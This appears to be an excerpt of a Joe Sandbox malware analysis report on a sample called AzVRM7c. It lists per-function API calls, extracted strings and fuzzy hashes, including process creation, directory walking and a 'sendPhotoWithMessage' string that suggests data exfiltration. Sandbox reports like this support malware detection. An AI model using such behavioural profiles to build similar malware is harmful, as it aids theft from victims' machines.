Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 96994052f686da90be6cdd5d0272697e511c0871d647bfaba78ffb88d0ffef50
Instruction ID: 23b5ebf810830eb60e855750d10d4090d59a1bb8a3dac0e5efbc16e4f6ec1378
Opcode Fuzzy Hash: 96994052f686da90be6cdd5d0272697e511c0871d647bfaba78ffb88d0ffef50
Instruction Fuzzy Hash: 12C1BB32B28A42C6EB50CFA8D4906AC3761FB49BA8B044239DA1E977D5DF3CE556C301

Function 00007FF6845BD544 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 143
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF6845BD572

Part of subcall function 00007FF6845BCA30: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6845BCA44

_get_daylight.LIBCMT ref: 00007FF6845BD583

Part of subcall function 00007FF6845BC9D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6845BC9E4

_get_daylight.LIBCMT ref: 00007FF6845BD594

Part of subcall function 00007FF6845BCA00: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6845BCA14

Part of subcall function 00007FF6845B8340: RtlFreeHeap.NTDLL(?,?,?,00007FF6845C2B26,?,?,?,00007FF6845C2EA3,?,?,00000000,00007FF6845C33AD,?,?,?,00007FF6845C32DF), ref: 00007FF6845B8356
Part of subcall function 00007FF6845B8340: GetLastError.KERNEL32(?,?,?,00007FF6845C2B26,?,?,?,00007FF6845C2EA3,?,?,00000000,00007FF6845C33AD,?,?,?,00007FF6845C32DF), ref: 00007FF6845B8360

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6845BD7D4), ref: 00007FF6845BD5BB

Strings

Q]1y, xrefs: 00007FF6845BD6DE
Eastern Standard Time, xrefs: 00007FF6845BD661
Eastern Summer Time, xrefs: 00007FF6845BD679

Memory Dump Source

Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true

Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time$Q]1y
API String ID: 3458911817-4173481814
Opcode ID: 605e4d1620cc9cfca92c84b904f75bcfa21439f3ad89b664e143ebe8e45af373
Instruction ID: ae632fa45c054e5674fa297a67a8a63c804133df8ec722c4623986d9a17bf0b6
Opcode Fuzzy Hash: 605e4d1620cc9cfca92c84b904f75bcfa21439f3ad89b664e143ebe8e45af373
Instruction Fuzzy Hash: F0516836A18642C6F720DF21E8D15AD6760BF88B84F44513EEA4DC3A9AEF3CE444C742

Function 00007FF68456A691 Relevance: 35.3, APIs: 15, Strings: 5, Instructions: 310fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE ref: 00007FF68456A6EE
FindClose.KERNEL32 ref: 00007FF68456A71B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456A76D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456A773
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456A77F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456A785
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68456A78B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456A791
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456A7C5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456A7DC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456A7E2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456A7E8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456A7EE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456A7FC
__std_fs_code_page.LIBCPMT ref: 00007FF68456A883

Strings

Q]1y, xrefs: 00007FF68456A82A
directory_entry::status, xrefs: 00007FF68456A7CF
directory_iterator::directory_iterator, xrefs: 00007FF68456A7B8
1, xrefs: 00007FF68456A8AD
exists, xrefs: 00007FF68456A7A4

Memory Dump Source

Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true

Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Find$CloseConcurrency::cancel_current_taskFileNext__std_fs_code_page
String ID: 1$Q]1y$directory_entry::status$directory_iterator::directory_iterator$exists
API String ID: 1745604696-3988379306
Opcode ID: b499a82b978a46e74169e3f81622344ba6f3a6f64f88cd31419b6ca9b0efcad5
Instruction ID: 072a1d7e6822300b8bce4ca99477bb5534fa09a65adc5256b80b6b692f079312
Opcode Fuzzy Hash: b499a82b978a46e74169e3f81622344ba6f3a6f64f88cd31419b6ca9b0efcad5
Instruction Fuzzy Hash: A9D17462A18B82C1EA209B25E4843BF7361FF86794F105635DB9D83AD9DF7CE980C701

Function 00007FF68459E7C8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__std_fs_open_handle.LIBCPMT ref: 00007FF68459E808

Part of subcall function 00007FF68459E770: CreateFileW.KERNEL32 ref: 00007FF68459E7A3
Part of subcall function 00007FF68459E770: GetLastError.KERNEL32 ref: 00007FF68459E7B2

SetFileInformationByHandle.KERNEL32 ref: 00007FF68459E832
__std_fs_open_handle.LIBCPMT ref: 00007FF68459E86A
CloseHandle.KERNEL32 ref: 00007FF68459E884
GetLastError.KERNEL32 ref: 00007FF68459E8B8
GetFileInformationByHandleEx.KERNEL32 ref: 00007FF68459E904
GetLastError.KERNEL32 ref: 00007FF68459E912
CloseHandle.KERNEL32 ref: 00007FF68459E928
SetFileInformationByHandle.KERNEL32 ref: 00007FF68459E954
SetFileInformationByHandle.KERNEL32 ref: 00007FF68459E988
GetLastError.KERNEL32 ref: 00007FF68459E9AA

Part of subcall function 00007FF6845B1774: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6845A8A1A,?,?,?,00007FF6845ACC32), ref: 00007FF6845B179A

Strings

Q]1y, xrefs: 00007FF68459E7DF

Memory Dump Source

Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true

Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd

Similarity

API ID: Handle$File$ErrorInformationLast$Close__std_fs_open_handle$CreateFeaturePresentProcessor
String ID: Q]1y
API String ID: 2221425841-3642082322
Opcode ID: 6bdbc50bed84b278626fece3ce0b26b3c0551dd7d3482e459f54058572bd27a5
Instruction ID: 63bdfebc537bd545af763e898f75dc6ec09b8d486d46dca97233c25a853dbadc
Opcode Fuzzy Hash: 6bdbc50bed84b278626fece3ce0b26b3c0551dd7d3482e459f54058572bd27a5
Instruction Fuzzy Hash: B4519161F08642C9F7648BB5A8842BD2FA0BF45798F18023DCD1AD6AC4DF3EE651C742

Function 00007FF68456A810 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF68456A883

Strings

Q]1y, xrefs: 00007FF68456A82A
status, xrefs: 00007FF68456AC93
directory_iterator::directory_iterator, xrefs: 00007FF68456A7B8, 00007FF68456AC7D
await sendPhotoWithMessage(, xrefs: 00007FF68456AD02
1, xrefs: 00007FF68456A8AD

Memory Dump Source

Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true

Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd

Similarity

API ID: __std_fs_code_page
String ID: 1$Q]1y$await sendPhotoWithMessage($directory_iterator::directory_iterator$status
API String ID: 1686256323-661328024
Opcode ID: 2465eb60af9682d34fb03b81d712e4271be86778465d4af5c69131ba14d2cf6a
Instruction ID: cb68b9677d55b71094ba3d2bd217441e6d334d9cb02bea6e6f01367b2f44a737
Opcode Fuzzy Hash: 2465eb60af9682d34fb03b81d712e4271be86778465d4af5c69131ba14d2cf6a
Instruction Fuzzy Hash: 12E19662A18B85C2EA609B25E58037F7361FF86B94F148236DB9D83795DF7CD881C701

Function 00007FF684575850 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 130
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32 ref: 00007FF6845758E4
GetLastError.KERNEL32 ref: 00007FF684575936
CloseHandle.KERNEL32 ref: 00007FF6845759D7
CloseHandle.KERNEL32 ref: 00007FF6845759E1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684575A4D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684575A53

Strings

Q]1y, xrefs: 00007FF684575867
Process started successfully., xrefs: 00007FF6845759FA
Failed to start process. Error: , xrefs: 00007FF68457594D

Memory Dump Source

Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true

Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd

Similarity

API ID: CloseHandle_invalid_parameter_noinfo_noreturn$CreateErrorLastProcess
String ID: Failed to start process. Error: $Process started successfully.$Q]1y
API String ID: 1451358647-917131678
Opcode ID: e3d3d740665aa7ee2c2765959bdd43bb499740c28333729e43370f3c62015b0a
Instruction ID: 6a5bb6f72e1222bc246a2b49fcbfdf047cb4eb2cca9f26595fe66f3ff9eecf4d
Opcode Fuzzy Hash: e3d3d740665aa7ee2c2765959bdd43bb499740c28333729e43370f3c62015b0a
Instruction Fuzzy Hash: 26518362E18785C6EA00CB65E48436DA361FFD57A4F50933AEAAC42EE9DF7CD080C701

Function 00007FF6845A91B0 Relevance: 7.6, APIs: 5, Instructions: 60threadCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6845A91DB
CreateThread.KERNEL32 ref: 00007FF6845A921C
GetLastError.KERNEL32 ref: 00007FF6845A922A
CloseHandle.KERNEL32 ref: 00007FF6845A9240
FreeLibrary.KERNEL32 ref: 00007FF6845A924F

Memory Dump Source

Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true

Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd

Similarity

API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
String ID:
API String ID: 2067211477-0
Opcode ID: ae3f8bb4fe257cc79dbb2d2f165059ab1c58b9f3a2a9237115300b53a347d4bb
Instruction ID: 5ad502897423657b173f4d2855ff620095ea7df5707baac2797f07397392f223
Opcode Fuzzy Hash: ae3f8bb4fe257cc79dbb2d2f165059ab1c58b9f3a2a9237115300b53a347d4bb
Instruction Fuzzy Hash: 07213A25A09B52C6EE54DB62A49417DB3A0FF89BD8F084939EE4E93B55DE3CE400C612

Function 00007FF684587870 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 202COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF684587B5B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684587B67

Strings

Q]1y, xrefs: 00007FF684587880

Memory Dump Source

Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true

Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: Q]1y
API String ID: 73155330-3642082322
Opcode ID: bd354e9ddf7cbed29d13e34746afe35b9c6be54291eeb770e1ff61d8a9e546c9
Instruction ID: c2d420e49481b80a3d9cac099df2074dfae1aeaa6803d6c54040b930c6d5745d
Opcode Fuzzy Hash: bd354e9ddf7cbed29d13e34746afe35b9c6be54291eeb770e1ff61d8a9e546c9
Instruction Fuzzy Hash: F171B262B6878682EE14CB15A88437EA355FF85BD4F14463AEE9D47B85EF3CE081C301

Function 00007FF684586930 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF684586B69
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684586B7B

Strings

ios_base::badbit set, xrefs: 00007FF684586930

Memory Dump Source

Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true

Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: ios_base::badbit set
API String ID: 73155330-3882152299
Opcode ID: c1169f8eb98a53ac9a0b8bd264596b5bdcb5148028f944edc5eecb64479fea85
Instruction ID: 01feb4f3e44261e590e78dcb7db85f750fecf392ad35059784821d3cdcb76690
Opcode Fuzzy Hash: c1169f8eb98a53ac9a0b8bd264596b5bdcb5148028f944edc5eecb64479fea85
Instruction Fuzzy Hash: CE51CF62A29B86C2EE24CB55E18027E6361FF94BE4F508639DABD437D5DF7CE490C201

Function 00007FF684562590 Relevance: 4.6, APIs: 3, Instructions: 120COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6845626FC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684562702
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF68456272D

Memory Dump Source

Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true

Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy
String ID:
API String ID: 1346393832-0
Opcode ID: 560a3cacb7b3363e95777e805e073be73bb341bd937cb9dedb7b8c95ea93974d
Instruction ID: 88faacc944a268fb2f07ac8ed34bfa5c8e7f194fa3c11eabc40cf3997dac59d1
Opcode Fuzzy Hash: 560a3cacb7b3363e95777e805e073be73bb341bd937cb9dedb7b8c95ea93974d
Instruction Fuzzy Hash: FB41C762A18B8581EA109B29E58137D6361FF997E4F109334FB9C42B9ADF3CE1C0C701

Function 00007FF6845A8704 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF6845A8700), ref: 00007FF6845A8715
TerminateProcess.KERNEL32(?,?,?,00007FF6845A8700), ref: 00007FF6845A8720
ExitProcess.KERNEL32 ref: 00007FF6845A872F

Memory Dump Source

Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true

Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 90b2bb542c3388067afa17ba55e6a045ef48b0742b450bfd02d82605817d26bb
Instruction ID: 5459b1a51c03efc19aa0ab2870363399e6633bafecbe515d147055cd19ed0ab9
Opcode Fuzzy Hash: 90b2bb542c3388067afa17ba55e6a045ef48b0742b450bfd02d82605817d26bb
Instruction Fuzzy Hash: 47D09E14F08602C2FB586B7178D527C12517F98B49F44143CC80F96793ED3DA44DC352

Function 00007FF684565680 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 190COMMON

Download Yara Rule

Strings

Q]1y, xrefs: 00007FF684565696

Memory Dump Source

Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true

Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd

Similarity

API ID:
String ID: Q]1y
API String ID: 0-3642082322
Opcode ID: c1ca8e71dca233b18151e78d569e65759aca1a0d3b30d694b6e1093483697a2d
Instruction ID: bcd8a125b2e0ab0d13619f9170a1383bb3f18828fc5015b333c541c788e0c2ae
Opcode Fuzzy Hash: c1ca8e71dca233b18151e78d569e65759aca1a0d3b30d694b6e1093483697a2d
Instruction Fuzzy Hash: 54611662A5864AC1EA608B19E08427DE391FF50BE0F54463AEF8D83BD5DF7CE482C305

Function 00007FF6845927F0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF684592A2B

Strings

Q]1y, xrefs: 00007FF684592805

Memory Dump Source

Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true

Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: Q]1y
API String ID: 3668304517-3642082322
Opcode ID: c5d642ed799c4159ed69cb954db0d6d14ae4b60587307b7214a5c5fbb0a0edd3
Instruction ID: b651ee37df7e99e4fb360b3a8d8995ae8821c8c9e19e5fe026f40a8a0ab1e187
Opcode Fuzzy Hash: c5d642ed799c4159ed69cb954db0d6d14ae4b60587307b7214a5c5fbb0a0edd3
Instruction Fuzzy Hash: 0C617272A18B85C5EB00CB65E4802ADA760FF84B94F50852AEF8D93B69DF7CD446C701

Function 00007FF684564660 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 89COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68456476C

Strings

Unknown exception, xrefs: 00007FF6845646D9

Memory Dump Source

Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true

Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: Unknown exception
API String ID: 3668304517-410509341
Opcode ID: 603a9e8d61f0d21dacede129d1c00d73baa36eba41d0eccb5d019084a6c393c9
Instruction ID: baabc6c320a20641634423d9abc857cb915129c4483dbe28cd366a44c833e46a
Opcode Fuzzy Hash: 603a9e8d61f0d21dacede129d1c00d73baa36eba41d0eccb5d019084a6c393c9
Instruction Fuzzy Hash: F1318662918BC5C1DB109B28E4813AD6361FF9A7A8F505335EB9C537A5EF3CD581C300

Function 00007FF684588870 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68457F4E0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68457F5E2
Part of subcall function 00007FF68457F4E0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68457F5E8

Part of subcall function 00007FF6845A91B0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6845A91DB

std::_Throw_Cpp_error.LIBCPMT ref: 00007FF684588957

Strings

Q]1y, xrefs: 00007FF684588883

Memory Dump Source

Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true

Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd

Similarity

API ID: Concurrency::cancel_current_taskCpp_errorThrow__invalid_parameter_noinfo_invalid_parameter_noinfo_noreturnstd::_
String ID: Q]1y
API String ID: 88918588-3642082322
Opcode ID: cda83e72df4b4452b10499556b15efd889cd94d2f8c263e70bb30bbf8a668c49
Instruction ID: b0f43c17b1bc7f7b3fdf895e44518347764320bfa822f4e18f60aabccf7432f9
Opcode Fuzzy Hash: cda83e72df4b4452b10499556b15efd889cd94d2f8c263e70bb30bbf8a668c49
Instruction Fuzzy Hash: FE217C36608B80C1E620DB12E4856AE73A1FF88BD4F458439EE8D87B59DE3CD051C701

Function 00007FF6845B8550 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00007FF6845B83CD,?,?,00000000,00007FF6845B8482), ref: 00007FF6845B85BE
GetLastError.KERNEL32(?,?,?,00007FF6845B83CD,?,?,00000000,00007FF6845B8482), ref: 00007FF6845B85C8

Memory Dump Source

Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true

Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 205954a0cb9a5bc48dda8edc75c8b963a8c5605bc07cd61d77332ffa7cc79ed3
Instruction ID: 625e00844dbc15ba061db9d4285d596504e49fd2e29b02de7407a0028547b79f
Opcode Fuzzy Hash: 205954a0cb9a5bc48dda8edc75c8b963a8c5605bc07cd61d77332ffa7cc79ed3
Instruction Fuzzy Hash: 09218E21F08642D1FAA09721A4D427D1282BF85BE4F48963DEA6EC77D2DF6CE445D302

Function 00007FF6845BB930 Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6845BB9B6

Memory Dump Source

Source File: 0000000B.00000002.2224411000.00007FF684561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF684560000, based on PE: true

Associated: 0000000B.00000002.2224354900.00007FF684560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224546014.00007FF6845ED000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.2224587674.00007FF6845F1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff684560000_AzVRM7c.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 5e62b5da85285c3ea154d9c64e7bec3a32060aad3f6a6f68b67314db75222940
Instruction ID: e962c937c07f49ed35a532a70096ff5938a1e619f0e4e803b4051f4c768792d3
Opcode Fuzzy Hash: 5e62b5da85285c3ea154d9c64e7bec3a32060aad3f6a6f68b67314db75222940
